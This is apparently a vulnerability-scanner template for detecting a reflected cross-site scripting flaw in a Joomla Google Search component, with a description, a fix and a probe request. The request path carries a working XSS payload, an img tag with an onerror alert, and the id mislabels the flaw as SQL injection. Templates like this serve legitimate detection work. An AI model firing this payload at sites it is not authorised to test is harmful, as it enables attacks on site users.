id: Joomla-sqli-googlesearch
info:
  name: Joomla_GoogleSearch_(CSE)_3.0.2_XSS_Vulnerabilities
  author:
  - 折跃
  description: |-
    Joomla! Cross-site scripting vulnerability in com_googlesearch_cse component
    Joomla! is an open source content management system (CMS).

    The Joomla! com_googlesearch_cse component has a cross-site scripting vulnerability. The vulnerability is caused by the program not properly filtering input submitted by users. A remote attacker could exploit this vulnerability to execute arbitrary script code in the user's browser.
  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program:
    http://www.joomla.org/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,'0x2334171512353333')
    - '!contains(body,"index.php%3Foption%3Dcom_googlesearch_cse%26n%3D30")'
    - '!contains(body,"index.php?option=com_googlesearch_cse&n=30&Itemid=&cx=0170936873967")'
  path:
  - '{{BaseURL}}/index.php?option=com_googlesearch_cse&n=30&Itemid=&cx=017093687396734519753%3Ao_92rwvgxxw&cof=FORID%3A9&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(''0x2334171512353333>'')%3E&sa=Search&hl=en'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
